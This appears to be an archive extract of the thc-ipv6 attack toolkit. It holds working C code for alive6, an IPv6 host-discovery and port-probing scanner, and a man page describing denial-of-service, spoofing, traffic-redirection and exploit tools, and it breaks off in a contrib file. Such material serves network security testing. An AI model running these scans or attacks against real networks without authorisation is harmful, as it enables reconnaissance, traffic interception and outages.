fprintf(stderr, "Warning: more than %d networks found, disabling double network check!\n", MAX_VENDID); } } else { ok = -1; // already scanned } } } else if (enumerate_mac && cur_dst[11] 
== 0xff && cur_dst[12] == 0xfe) { i = 0; if (no_vendid > 0) for (j = 0; j < no_vendid; j++) if (memcmp(vendid[j], cur_dst, 11) == 0) i = 1; if (i == 0) { cur_enum = 1; restart = 1; } else ok = -1; // already scanned } else if (fcnt) { cur_enum = 4; restart = 1; } } } if (cur_enum == 0 && curr == 0) curr++; } else if (cur_enum == 1) { // enumeration of vendor-id keyspaces identified, lowest 3 bytes of ipv6 if (restart) { restart = 0; bl = bm = bh = 0; memcpy(cur_dst, orig_dst, 16); memset(cur_dst + 13, 0, 3); if (verbose) { p2 = thc_ipv62notation(cur_dst); printf("Info: started autoconfiguration address space scan on %s\n", p2); free(p2); } if (no_vendid < MAX_VENDID) { memcpy(vendid[no_vendid], cur_dst, 11); no_vendid++; if (no_vendid == MAX_VENDID) fprintf(stderr, "Warning: more than %d vendor ids found, disabling double vendor id check!\n", MAX_VENDID); } } else { if (bl == 255) { bl = 0; if (bm == 255) { bm = 0; bh++; cur_dst[13] = bh; } else { bm++; } cur_dst[14] = bm; } else { bl++; if (bh == 255 && bm == 255 && bl == 255) { if (fcnt) { cur_enum = 4; restart = 1; } else { cur_enum = 0; if (curr == 0) curr++; } } } } cur_dst[15] = bl; } else if (cur_enum == 2) { // enumeration of common dhcp6 address space, // using dict[] ranges, approx. 
2200 addresses if (restart) { memcpy(cur_dst, orig_dst, 16); memset(cur_dst + 8, 0, 8); if (verbose) { p2 = thc_ipv62notation(cur_dst); printf("Info: started common address space scan on %s\n", p2); free(p2); } restart = 0; ip1 = ip2 = ip3 = ip4 = 0; // only because dict starts with 0 dictptr = 0; } else { if (ip4 < dict[dictptr + 7]) ip4++; else if (ip3 < dict[dictptr + 6]) { ip3++; ip4 = dict[dictptr + 3]; } else if (ip2 < dict[dictptr + 5]) { ip2++; ip3 = dict[dictptr + 2]; ip4 = dict[dictptr + 3]; } else if (ip1 < dict[dictptr + 4]) { ip1++; ip2 = dict[dictptr + 1]; ip3 = dict[dictptr + 2]; ip4 = dict[dictptr + 3]; } else { dictptr += 8; ip1 = dict[dictptr]; ip2 = dict[dictptr + 1]; ip3 = dict[dictptr + 2]; ip4 = dict[dictptr + 3]; } cur_dst[8] = ip1 / 256; cur_dst[9] = ip1 % 256; cur_dst[10] = ip2 / 256; cur_dst[11] = ip2 % 256; cur_dst[12] = ip3 / 256; cur_dst[13] = ip3 % 256; cur_dst[14] = ip4 / 256; cur_dst[15] = ip4 % 256; if (ip1 == ip2 && ip1 == ip3 && ip1 == ip4 && ip1 == 0xffff) { // end of dict if (enumerate_mac && orig_dst[11] == 0xff && orig_dst[12] == 0xfe) { i = 0; if (no_vendid > 0) for (j = 0; j < no_vendid; j++) if (memcmp(vendid[j], orig_dst, 11) == 0) i = 1; if (i == 0) { cur_enum = 1; restart = 1; } else cur_enum = 0; } else { if (fcnt) { cur_enum = 4; restart = 1; } else { cur_enum = 0; } } if (curr == 0 && cur_enum == 0) curr++; } } } else if (cur_enum == 4) { // -4 option if (restart) { // bl = return, bm = fcnt_counter, bh = state if (verbose) { p2 = thc_ipv62notation(cur_dst); printf("Info: started IPv4 address space scan on %s\n", p2); free(p2); } restart = 0; bl = bm = bh = 0; addr_cur = four_from[bm]; } memcpy(cur_dst, orig_dst, 16); bl = adress4to6(cur_dst, addr_cur, &bh); //printf("return %d, state now %d, fcnt is %d\n", bl, bh, bm); if (bl == 1) { // done addr_cur state addr_cur++; bh = 0; if (addr_cur > four_to[bm]) { bm++; if (bm < fcnt) { addr_cur = four_from[bm]; } else { cur_enum = 0; if (curr == 0) curr++; } } } } // else if 
(cur_enum == 3) { if (fromto) { fromto = 0; ok = 1; // init if (strlen(ptr) > 80) { ok = 0; } else { if (curr != 0) { memcpy(line2, line, 80); ptr = line2; line2[80] = 0; } memset(line, 0, 80); i = j = k = 0; while (i == 0) { while (ptr[k] != '-' && k < 80 && ptr[k] != 0) line[j++] = ptr[k++]; if (ptr[k] == '-') while (ptr[k] != ':' && k < 80 && ptr[k] != 0) k++; if (ptr[k] != ':') i = 1; } if (verbose > 1) printf("Resolving %s ...\n", line); //printf("ptr: %s, line %s, cur_dst %s, multicast6 %s\n", ptr, line, cur_dst, multicast6); if ((cur_dst = thc_resolve6(line)) == NULL) { ok = 0; } else { memset(line, 0, 80); j = k = strlen(ptr) - 1; while (i == 1) { while (ptr[k] != '-' && k >= 0 && ptr[k] != 0) line[j--] = ptr[k--]; if (ptr[k] == '-') while (ptr[k] != ':' && k >= 0 && ptr[k] != 0) k--; if (ptr[k] != ':') i = 0; } } ptr2 = &line[j + 1]; if (verbose > 1) printf("Resolving %s ...\n", ptr2); if ((ptr3 = thc_resolve6(ptr2)) == NULL) { ok = 0; } else { cip1 = fip1 = (cur_dst[0] << 8) + (unsigned char) cur_dst[1]; cip2 = fip2 = (cur_dst[2] << 8) + (unsigned char) cur_dst[3]; cip3 = fip3 = (cur_dst[4] << 8) + (unsigned char) cur_dst[5]; cip4 = fip4 = (cur_dst[6] << 8) + (unsigned char) cur_dst[7]; cip5 = fip5 = (cur_dst[8] << 8) + (unsigned char) cur_dst[9]; cip6 = fip6 = (cur_dst[10] << 8) + (unsigned char) cur_dst[11]; cip7 = fip7 = (cur_dst[12] << 8) + (unsigned char) cur_dst[13]; cip8 = fip8 = (cur_dst[14] << 8) + (unsigned char) cur_dst[15]; tip1 = (ptr3[0] << 8) + (unsigned char) ptr3[1]; tip2 = (ptr3[2] << 8) + (unsigned char) ptr3[3]; tip3 = (ptr3[4] << 8) + (unsigned char) ptr3[5]; tip4 = (ptr3[6] << 8) + (unsigned char) ptr3[7]; tip5 = (ptr3[8] << 8) + (unsigned char) ptr3[9]; tip6 = (ptr3[10] << 8) + (unsigned char) ptr3[11]; tip7 = (ptr3[12] << 8) + (unsigned char) ptr3[13]; tip8 = (ptr3[14] << 8) + (unsigned char) ptr3[15]; if (fip1 > tip1 || fip2 > tip2 || fip3 > tip3 || fip4 > tip4 || fip5 > tip5 || fip6 > tip6 || fip7 > tip7 || fip8 > tip8) ok = 0; 
if (ok && verbose) { p2 = thc_ipv62notation(cur_dst); p3 = thc_ipv62notation(ptr3); printf("Info: started range address scan from %s to %s \n", p2, p3); free(p2); free(p3); } free(ptr3); } } if (ok) { memcpy(orig_dst, cur_dst, 16); } else { fprintf(stderr, "Error: range is invalid: %s, skipping\n", ptr); cur_enum = 0; if (curr == 0) curr++; } } else { if (cip8 < tip8) cip8++; else if (cip7 < tip7) { cip7++; cip8 = fip8; } else if (cip6 < tip6) { cip6++; cip7 = fip7; cip8 = fip8; } else if (cip5 < tip5) { cip5++; cip6 = fip6; cip7 = fip7; cip8 = fip8; } else if (cip4 < tip4) { cip4++; cip5 = fip5; cip6 = fip6; cip7 = fip7; cip8 = fip8; } else if (cip3 < tip3) { cip3++; cip4 = fip4; cip5 = fip5; cip6 = fip6; cip7 = fip7; cip8 = fip8; } else if (cip2 < tip2) { cip2++; cip3 = fip3; cip4 = fip4; cip5 = fip5; cip6 = fip6; cip7 = fip7; cip8 = fip8; } else if (cip1 < tip1) { cip1++; cip2 = fip2; cip3 = fip3; cip4 = fip4; cip5 = fip5; cip6 = fip6; cip7 = fip7; cip8 = fip8; } else ok = 0; cur_dst[0] = cip1 / 256; cur_dst[1] = cip1 % 256; cur_dst[2] = cip2 / 256; cur_dst[3] = cip2 % 256; cur_dst[4] = cip3 / 256; cur_dst[5] = cip3 % 256; cur_dst[6] = cip4 / 256; cur_dst[7] = cip4 % 256; cur_dst[8] = cip5 / 256; cur_dst[9] = cip5 % 256; cur_dst[10] = cip6 / 256; cur_dst[11] = cip6 % 256; cur_dst[12] = cip7 / 256; cur_dst[13] = cip7 % 256; cur_dst[14] = cip8 / 256; cur_dst[15] = cip8 % 256; if (ok == 0) { cur_enum = 0; if (enumerate_dhcp) { /* if (local) { if (cur_dst[0] != 0xff) { p2 = thc_ipv62notation(orig_dst); fprintf(stderr, "Warning: enumeration on local address %s disabled, use ff02::1!\n", p2); free(p2); } } else */ { i = 0; if (no_nets > 0) for (j = 0; j < no_nets; j++) if (memcmp(nets[j], cur_dst, 8) == 0) i = 1; if (i == 0) { cur_enum = 2; restart = 1; if (no_nets < MAX_NETS) { memcpy(nets[no_nets], cur_dst, 8); no_nets++; if (no_nets == MAX_NETS) fprintf(stderr, "Warning: more than %d networks found, disabling double network check!\n", MAX_VENDID); } } else { ok = 
-1; // already scanned } } } else if (enumerate_mac && orig_dst[11] == 0xff && orig_dst[12] == 0xfe) { i = 0; if (no_vendid > 0) for (j = 0; j < no_vendid; j++) if (memcmp(vendid[j], cur_dst, 11) == 0) i = 1; if (i == 0) { cur_enum = 1; restart = 1; } } else { cur_enum = 0; } if (curr == 0) curr++; } } } if (cur_enum > 4) { fprintf(stderr, "Error: WTF?!\n"); exit(-1); } if (print_only) { p2 = thc_ipv62notation(cur_dst); printf("Address: %s\n", p2); free(p2); ok = 0; } // here we send the alive check packets - if we have a valid destination if (do_router) { routers[0] = cur_dst; routers[1] = NULL; cur_dst = router6; // switch destination and router } // central dst mac lookup and fast/slow implementation no_send = no_send_local; if (ok != 0 && rawmode == 0 && cur_dst != NULL && do_router == 0 && use_dmac == 0) { if (local == -1) local = thc_is_dst_local(interface, cur_dst); if (local == 0 && slow == 0) { if (rmac == NULL) rmac = thc_get_mac(interface, src6, cur_dst); mac = rmac; } if (local && (ndp_only || slow)) mac = thc_lookup_ipv6_mac(interface, cur_dst); else mac = thc_get_mac(interface, src6, cur_dst); if (local && mac != NULL && slow == 0 && cur_dst[0] != 0xff) { // if a local system has an neighbor entry, assume its alive if the slow // mode is not set. so if proxy NA is present, use -S if (resolve) he = gethostbyaddr(cur_dst, 16, AF_INET6); p2 = thc_ipv62notation(cur_dst); printf("Alive: %s%s%s%s [NDP %02x:%02x:%02x:%02x:%02x:%02x]\n", p2, resolve ? " (" : "", resolve && he != NULL ? he->h_name : "", resolve ? ")" : "", mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]); if (out != NULL) fprintf(out, "%s%s%s%s\n", p2, resolve ? " (" : "", (resolve && he != NULL) ? he->h_name : "", resolve ? 
")" : ""); free(p2); if (alive_no < MAX_ALIVE && (alive[alive_no] = malloc(16)) != NULL) { memcpy(alive[alive_no], cur_dst, 16); alive_no++; if (alive_no == MAX_ALIVE) fprintf(stderr, "Warning: more than %d alive systems detected, disabling double results check!\n", MAX_ALIVE); } tcount++; ok = 0; } else if (ndp_only) ok = 0; if (mac == NULL) { p2 = thc_ipv62notation(cur_dst); if (ndp_only == 0) fprintf(stderr, "Error: Can not resolve mac address for %s\n", p2); free(p2); ok = 0; } } if (use_dmac) mac = dmac; else if (local == 0) no_send = no_send_remote; if (ok != 0 && cur_dst != NULL) { if (debug) printf("DEBUG: sending alive check packets to %s\n", thc_ipv62notation(cur_dst)); else if (verbose > 2) { p2 = thc_ipv62notation(cur_dst); printf("Testing %s ...\n", p2); free(p2); } for (nos = 0; nos < no_send; nos++) { // send -n defined times, default: 1 if (do_ping) { if ((pkt = thc_create_ipv6_extended(interface, prefer, &pkt_len, src6, cur_dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (router6 != NULL) if (thc_add_hdr_route(pkt, &pkt_len, routers, 1) < 0) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, sizeof(buf), 0) < 0) return -1; if (thc_generate_pkt(interface, smac, mac, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Can not send packet, exiting ...\n"); exit(-1); } if (router6 != NULL) { hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src6, cur_dst, NXT_ROUTE, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > 1240 ? 
1240 : (((hdr->pkt_len - 40 - offset) / 16) + 1) * 8); } else while (thc_send_pkt(interface, pkt, &pkt_len) < 0) usleep(1); pkt = thc_destroy_packet(pkt); if (waittime) usleep(waittime); } if (do_dst) { if ((pkt = thc_create_ipv6_extended(interface, prefer, &pkt_len, src6, cur_dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (router6 != NULL) if (thc_add_hdr_route(pkt, &pkt_len, routers, 1) < 0) return -1; if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf2, sizeof(buf2)) < 0) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, sizeof(buf), 0) < 0) return -1; thc_generate_pkt(interface, smac, mac, pkt, &pkt_len); if (router6 != NULL) { hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src6, cur_dst, NXT_ROUTE, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > 1240 ? 1240 : (((hdr->pkt_len - 40 - offset) / 16) + 1) * 8); } else while(thc_send_pkt(interface, pkt, &pkt_len) < 0) usleep(1); pkt = thc_destroy_packet(pkt); if (waittime) usleep(waittime); } if (do_hop) { if ((pkt = thc_create_ipv6_extended(interface, prefer, &pkt_len, src6, cur_dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (router6 != NULL) if (thc_add_hdr_route(pkt, &pkt_len, routers, 1) < 0) return -1; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &buf2, sizeof(buf2)) < 0) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, sizeof(buf), 0) < 0) return -1; thc_generate_pkt(interface, smac, mac, pkt, &pkt_len); if (router6 != NULL) { hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src6, cur_dst, NXT_ROUTE, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > 1240 ? 
1240 : (((hdr->pkt_len - 40 - offset) / 16) + 1) * 8); } else while(thc_send_pkt(interface, pkt, &pkt_len) < 0) usleep(1); pkt = thc_destroy_packet(pkt); if (waittime) usleep(waittime); } if (udpports[0] != -1) { i = 0; while (udpports[i] != -1 && i < MAX_PORTS) { if ((pkt = thc_create_ipv6_extended(interface, prefer, &pkt_len, src6, cur_dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (router6 != NULL) if (thc_add_hdr_route(pkt, &pkt_len, routers, 1) < 0) return -1; if (thc_add_udp(pkt, &pkt_len, sp, udpports[i] % 65536, 0, dns6buf, sizeof(dns6buf)) < 0) return -1; if (thc_generate_pkt(interface, smac, mac, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Can not send packet, exiting ...\n"); exit(-1); } if (router6 != NULL) { hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src6, cur_dst, NXT_ROUTE, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > 1240 ? 1240 : (((hdr->pkt_len - 40 - offset) / 16) + 1) * 8); } else while(thc_send_pkt(interface, pkt, &pkt_len) < 0) usleep(1); pkt = thc_destroy_packet(pkt); if (waittime) usleep(waittime); i++; } } if (synports[0] != -1 || portscan) { i = 0; while ((portscan > 0 && portscan < 65536) || (synports[i] != -1 && i < MAX_PORTS)) { if ((pkt = thc_create_ipv6_extended(interface, prefer, &pkt_len, src6, cur_dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (router6 != NULL) if (thc_add_hdr_route(pkt, &pkt_len, routers, 1) < 0) return -1; if (portscan) { if (thc_add_tcp(pkt, &pkt_len, sp, portscan % 65536, (sp << 16) + sp, 0, TCP_SYN, 5760, 0, NULL, 0, NULL, 0) < 0) return -1; portscan++; } else { if (thc_add_tcp(pkt, &pkt_len, sp, synports[i] % 65536, (sp << 16) + sp, 0, TCP_SYN, 5760, 0, NULL, 0, NULL, 0) < 0) return -1; } if (thc_generate_pkt(interface, smac, mac, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Can not send packet, exiting ...\n"); exit(-1); } if (router6 != NULL) { hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src6, cur_dst, NXT_ROUTE, hdr->pkt + 40 + offset, hdr->pkt_len - 40 
- offset, hdr->pkt_len > 1240 ? 1240 : (((hdr->pkt_len - 40 - offset) / 16) + 1) * 8); } else while(thc_send_pkt(interface, pkt, &pkt_len) < 0) usleep(1); pkt = thc_destroy_packet(pkt); if (waittime) usleep(waittime); i++; while (thc_pcap_check(p, (char *) check_packets, NULL) > 0); } if (portscan) portscan = 1; } if (ackports[0] != -1) { i = 0; while (ackports[i] != -1 && i < MAX_PORTS) { if ((pkt = thc_create_ipv6_extended(interface, prefer, &pkt_len, src6, cur_dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (router6 != NULL) if (thc_add_hdr_route(pkt, &pkt_len, routers, 1) < 0) return -1; if (thc_add_tcp(pkt, &pkt_len, sp, ackports[i] % 65536, (sp << 16) + sp, (sp << 16) + sp, TCP_ACK, 5760, 0, NULL, 0, NULL, 0) < 0) return -1; if (thc_generate_pkt(interface, smac, mac, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Can not send packet, exiting ...\n"); exit(-1); } if (router6 != NULL) { hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src6, cur_dst, NXT_ROUTE, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > 1240 ? 
1240 : (((hdr->pkt_len - 40 - offset) / 16) + 1) * 8); } else while(thc_send_pkt(interface, pkt, &pkt_len) < 0) usleep(1); pkt = thc_destroy_packet(pkt); if (waittime) usleep(waittime); i++; } } } if (ok == -1) { ok = 0; // if (cur_enum != 3) cur_enum = 0; } tcount++; if (do_router) cur_dst = router6; // switch back // cleanup if (cur_enum == 0 && cur_dst != multicast6) free(cur_dst); if (cur_enum == 0 || cur_dst[15] == 0xff || tcount % 16 == 0) while (thc_pcap_check(p, (char *) check_packets, NULL) > 0); } if (mac != NULL && mac != rmac && use_dmac == 0) { free(mac); mac = NULL; } } // sleep(1); while (thc_pcap_check(p, (char *) check_packets, NULL) > 0); if (curr > 1 || list > 0 || ok != 0 || tcount > alive_no || still_not_there == 1) { passed = time(NULL); do { thc_pcap_check(p, (char *) check_packets, NULL); } while (passed + 5 >= time(NULL) && (verbose > 1 || (tcount >= alive_no && (tcount > 1 || list > 0 || alive_no == 0 || still_not_there == 1)) || (multicast6 != NULL && multicast6[0] == 0xff))); } while (thc_pcap_check(p, (char *) check_packets, NULL) > 0); thc_pcap_close(p); if (out != NULL) fclose(out); printf("\nScanned %lu address%s and found %d system%s alive\n", tcount, tcount == 1 ? "" : "es", alive_no, alive_no == 1 ? "" : "s"); if (verbose) { timeval = time(NULL); printf("Completed alive6 scan at %s\n", ctime(&timeval)); } if (alive_no) return 0; else return 1; } thc-ipv6-2.5/thc-ipv6.80000644000000000000000000002770112256500740013257 0ustar rootroot.\" Hey, EMACS: -*- nroff -*- .\" First parameter, NAME, should be all caps .\" Second parameter, SECTION, should be 1-8, maybe w/ subsection .\" other parameters are allowed: see man(7), man(1) .TH THC-IPv6 ATTACK-TOOLKIT6 8 "December 2013" .\" Please adjust this date whenever revising the manpage. 
.\" .\" Some roff macros, for reference: .\" .nh disable hyphenation .\" .hy enable hyphenation .\" .ad l left justify .\" .ad b justify to both left and right margins .\" .nf disable filling .\" .fi enable filling .\" .br insert line break .\" .sp insert n+1 empty lines .\" for manpage-specific macros, see man(7) .SH NAME The Hacker Choice's IPv6 Attack Toolkit (aka thc-ipv6) .SH SYNOPSIS .B tool [options] ... .TP .SH DESCRIPTION This manual page briefly documents each of the .B attack-toolkit6 tools. Not all options are listed here; to see the full list of options of each tool please invoke them with .B -h. .IP Note that on Debian (if you read this on Debian) command names are prefixed with .I atk6- , so for example the tool .B alive6 should be invoked as .I atk6-alive6. This is a Debian-only modification. .PP .TP .B address6 [ipv6-prefix] Converts a mac or ipv4 address to an ipv6 address (link local if no prefix is given as 2nd option) or, when given an ipv6 address, prints the mac or ipv4 address. Prints all possible variations. Returns \-1 on errors or the number of variations found. .TP .B alive6 [unicast-or-multicast-address [remote-router]] Shows alive addresses in the segment. If you specify a remote router, the packets are sent with a routing header prefixed by fragmentation. .TP .B covert_send6 [port] Sends the content of FILE covertly to the target. .TP .B covert_send6d Writes covertly received content to FILE. .TP .B denial6 Performs various denial of service attacks on a target. .TP .B detect_sniffer6 [target-ip] Tests if systems on the local LAN are sniffing. Works against Windows, Linux, OS/X and *BSD systems. .TP .B dnssecwalk [-e46] Performs DNSSEC NSEC walking. .TP .B dos_mld This tool prevents new ipv6 interfaces from coming up, by sending answers to duplicate ip6 checks (DAD). This results in a DOS for new ipv6 devices. .TP .B dos-new-ip6 This tool prevents new ipv6 interfaces from coming up, by sending answers to duplicate ip6 checks (DAD). 
This results in a DOS for new ipv6 devices. .TP .B detect-new-ip6 [scriptname] This tool detects new ipv6 addresses joining the local network. If scriptname is supplied, it is executed with the detected IPv6 address as option. .TP .B dnsdict6 [-t THREADS] [dictionary-file] Enumerates a domain for DNS entries; it uses a dictionary file if supplied or a built-in list otherwise. .TP .B dnsrevenum6 Performs a fast reverse DNS enumeration. .TP .B dump_router6 Dumps all local routers and their information. .TP .B dump_dhcp6 Dumps all DHCPv6 servers and their information. .TP .B exploit6 [test-case-number] Performs exploits of various CVE known IPv6 vulnerabilities on the destination. .TP .B extract_hosts6 Prints the host parts of ipv6 addresses in file. .TP .B extract_networks6 Prints the networks found in file. .TP .B fake_advertise6 [target-address [own-mac-address]] Advertise ipv6 address on the network (with own mac if not defined) sending it to the all-nodes multicast address if no target specified. .TP .B fake_dhcps6 Fake DHCPv6 server. Used to configure an address and set a DNS server. .TP .B fake_dns6d Fake DNS server that serves the same IPv6 address to any lookup request. .TP .B fake_dnsupdate6 Send false DNS update requests. .TP .B fake_mipv6 If the mobile IPv6 home-agent is mis-configured to accept MIPV6 updates without IPSEC, this will redirect all packets for home-address to care-of-address. .TP .B fake_mld6 [[target-address] [[ttl] [[own-ip] [own-mac-address]]]] Advertise yourself in a multicast group of your choice. .TP .B fake_mld26 [-l] [multicast-address [target-address [ttl [own-ip [own-mac-address [destination-mac-address]]]]]] This uses the MLDv2 protocol. Only a subset of what the protocol is able to do is possible to implement via a command line. .TP .B fake_mldrouter6 [-l] [own-ip [own-mac-address]] Announce, delete or solicit MLD router - yourself or others. 
.TP .B fake_pim6 [-t ttl] [-s src6] [-d dst6] { [dr_priority]|{join|prune} } The hello command takes optionally the DR priority (default: 0). .TP .B fake_router6 [mac-address] Announce yourself as a router and try to become the default router. If a non-existing mac-address is supplied, this results in a DOS. .TP .B fake_router26 Like .B fake_router6 with more options available. .TP .B fake_solicitate6 Solicits IPv6 address on the network, sending it to the all-nodes multicast address. .TP .B firewall6 [-u] [test-case-no] Performs various ACL bypass attempts to check implementations. Defaults to TCP ports, option \-u switches to UDP. For all test cases to work, ICMPv6 ping to the destination must be allowed. .TP .B flood_advertise6 Flood the local network with neighbor advertisements. .TP .B flood_dhcpc6 [domain-name] DHCP client flooder. Use to deplete the IP address pool a DHCP6 server is offering. Note: if the pool is very large, this is rather senseless. .TP .B flood_mld6 Flood the local network with MLD reports. .TP .B flood_mld26 Flood the local network with MLDv2 reports. .TP .B flood_mldrouter6 Flood the local network with MLD router advertisements. .TP .B flood_redir6 [-HFD] interface [target] [oldrouter [newrouter]] Flood a target with ICMPv6 redirects .TP .B flood_router6 Flood the local network with router advertisements. .TP .B flood_router26 Similar to .B flood_router6 but with more options available. .TP .B flood_rs6 [-sS] interface [target] flood a network with ICMPv6 router solicitation messages .TP .B flood_solicitate6 [target-ip] Flood the network with neighbor solicitations. .TP .B four2six [-FHD] [-s src6] interface ipv6-to-ipv4-gateway ipv4-src ipv4-dst [port] Send (spoofed) packets over a 4to6 tunnel (IPv4 packets over IPv6 networks) .TP .B fragmentation6 Performs fragment firewall and implementation checks, including denial-of-service. 
.TP .B fuzz_dhcps6 [-x] [-t number | -T number] [-p number] [-IFSDHRJ] [-1|-2|-3|-4|-5|-6|-7] [address-in-data-pkt] Fuzzes an icmp6 packet. .TP .B fuzz_dhcps6 [-t number | -T number] [-e number | -T number] [-p number] [-md] [-1|-2|-3|-4|-5|-6|-7|-8] interface [domain-name] Fuzzes a DHCPv6 server on specified packet types. .TP .B implementation6 [test-case-number] Performs some ipv6 implementation checks, can be used to test firewalls too. .TP .B implementation6d Identifies test packets sent by the implementation6 tool, useful to check what packets passed a firewall. .TP .B inject_alive6 [-ap] This tool answers keep-alive requests on PPPoE and 6in4 tunnels; for PPPoE it also sends keep-alive requests. Note that the appropriate environment variable THC_IPV6_{PPPOE|6IN4} must be set. Option \-a will actively send alive requests every 15 seconds. Option \-p will not send replies to alive requests. .TP .B inverse_lookup6 Performs an inverse address query, to get the IPv6 addresses that are assigned to a MAC address. Note that only a few systems support this yet. .TP .B kill_router6 Announce that target router is going down to delete it from the routing tables. If you supply a '*' as target-ip, this tool will sniff the network for RAs and immediately send the kill packet. .TP .B ndpexhaust26 [-acpPTUrR] [-s sourceip6] Flood the target /64 network with ICMPv6 TooBig error messages. This tool version is manyfold more effective than ndpexhaust6. \-a add a hop-by-hop header with router alert. \-c do not calculate the checksum to save time. \-p send ICMPv6 Echo Requests. \-P send ICMPv6 Echo Reply. \-T send ICMPv6 Time-to-live-exceeded. \-U send ICMPv6 Unreachable (no route). \-r randomize the source from your /64 prefix. \-R randomize the source fully. \-s sourceip6 use this as source ipv6 address. .TP .B ndpexhaust6 Randomly pings IPs in target network. .TP .B node_query6 Sends an ICMPv6 node query request to the target and dumps the replies. 
.TP .B parasite6 [fake-mac] This is an "ARP spoofer" for IPv6, redirecting all local traffic to your own system (or nirvana if fake-mac does not exist) by answering falsely to Neighbor Solicitation requests. Specifying FAKE-MAC results in a local DOS. .TP .B passive_discovery6 [scriptname] Passively sniffs the network and dumps all clients' IPv6 addresses detected. If scriptname is supplied, it is called with the detected IPv6 address as first and the interface as second parameters. .TP .B randicmp6 Sends all ICMPv6 type and code combinations to target. .TP .B redir6 [new-router-mac] Implant a route into src-ip, which redirects all traffic to target-ip to new-ip. You must know the router which would handle the route. If the new-router-mac does not exist, this results in a DOS. .TP .B redirsniff6 [ [new-router-mac]] Implant a route into victim-ip, which redirects all traffic to destination-ip to new-router. You must know the router which would handle the route. If the new-router and new-router-mac do not exist, this results in a DoS. .TP .B rsmurf6 Smurfs the local network of the victim. Note: this depends on an implementation error, currently only verified on Linux (fixed in current versions). Evil: "ff02::1" as victim will DOS your local LAN completely. .TP .B smurf6 [multicast-network-address] Smurf the target with ICMPv6 echo replies. Target of echo request is the local all-nodes multicast address if not specified. .TP .B sendpees6 Send SEND neighbor solicitation messages and make the target verify a lot of CGA and RSA signatures. .TP .B sendpeesmp6 Multithreaded version of .B sendpees6. .TP .B trace6 [-d] targetaddress [port] A basic but very fast traceroute6 program. .TP .B thcping6 Craft your special ICMPv6 echo request packet. .TP .B thcsyn6 [-AcDrRS] [-p port] [-s source-ip6] Flood the target port with TCP-SYN packets. If you supply "x" as port, it is randomized. 
.TP .B toobig6 Implants the specified mtu on the target .SH SEE ALSO .BR nmap (1), .BR amap (1), .BR dsniff (8). .SH AUTHOR thc-ipv6 was written by van Hauser / THC .PP The homepage for this toolkit is: http://www.thc.org/thc-ipv6 .PP This manual page was written by Maykel Moya and Arturo Borrero Gonzalez , for the Debian project (but may be used by others). It's based on previous work by Michael Gebetsroither . thc-ipv6-2.5/contrib/0000755000000000000000000000000012256335512013162 5ustar rootrootthc-ipv6-2.5/contrib/spoofer.h0000644000000000000000000000033012256335477015016 0ustar rootroot#ifndef SPOOFER_H_ #define SPOOFER_H_ #include "data_structures.h" #if defined (SPOOFER_C) #define SPOOFER_EXT #else #define SPOOFER_EXT extern #endif SPOOFER_EXT void spoofer(MArgs mArgss); #endif /*SPOOFER_H_ */ thc-ipv6-2.5/contrib/host_scan.c0000644000000000000000000003661312256335477015332 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #define HOST_SCAN_C_ #include "host_scan.h" #undef HOST_SCAN_C_ #define ETH_HDR_LEN 14 // Extensão do cabeçalho Ethernet #define IP6_HDR_LEN 40 // Extensão do cabeçalho IPv6 #define BUF_SIZE 16 // Extensão do Buffer de Envio #define PKT_FLAGS 0xdeadbeef // Flags de envio do pacote [ID|SEQ] extern int debug; // variavel que indica se o debug esta ativo ou nao unsigned char buf[BUF_SIZE]; // Buffer de dados de envio unsigned char *alive[65536]; // tabela de hosts encontrados [Armazena Endereços IP] unsigned char *aliveMac[65536]; // tabela de hosts encontrados [Armazena endereços MAC] int alive_no = 0; // contador do numero de hosts encontrados // funcao de ajuda do programa void help(char *prg) { printf("code by Fabricio Nogueira Buzeto and Carlos Botelho De Paula Filho\n\n"); printf("Syntax: %s [-r] interface [unicast-or-multicast-address [remote-router]]\n", prg); printf("Shows alive addresses in the segment. 
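If you specify a remote router, the\n");
  printf("packets are sent with a routing header prefixed by fragmentation\n");
// printf("Use -r to use raw mode.\n");
  exit(-1);
}

/**
 * Packet capture callback (handed to the pcap check loop).
 *
 * Records the IPv6 source address and the source MAC address of every
 * captured frame that is not already present in the alive[] / aliveMac[]
 * tables, and prints one '.' per newly recorded host.
 *
 *   foo    --> not used by this callback
 *   header --> capture metadata; only caplen (number of bytes actually
 *              available in data) is read here
 *   data   --> captured frame; the fixed offsets below assume an Ethernet
 *              header followed directly by the IPv6 header
 *              (NOTE(review): confirm for non-Ethernet link types)
 *
 * Everything in data comes from the network, so nothing is read before
 * caplen has been checked and nothing is stored once the tables are full.
 */
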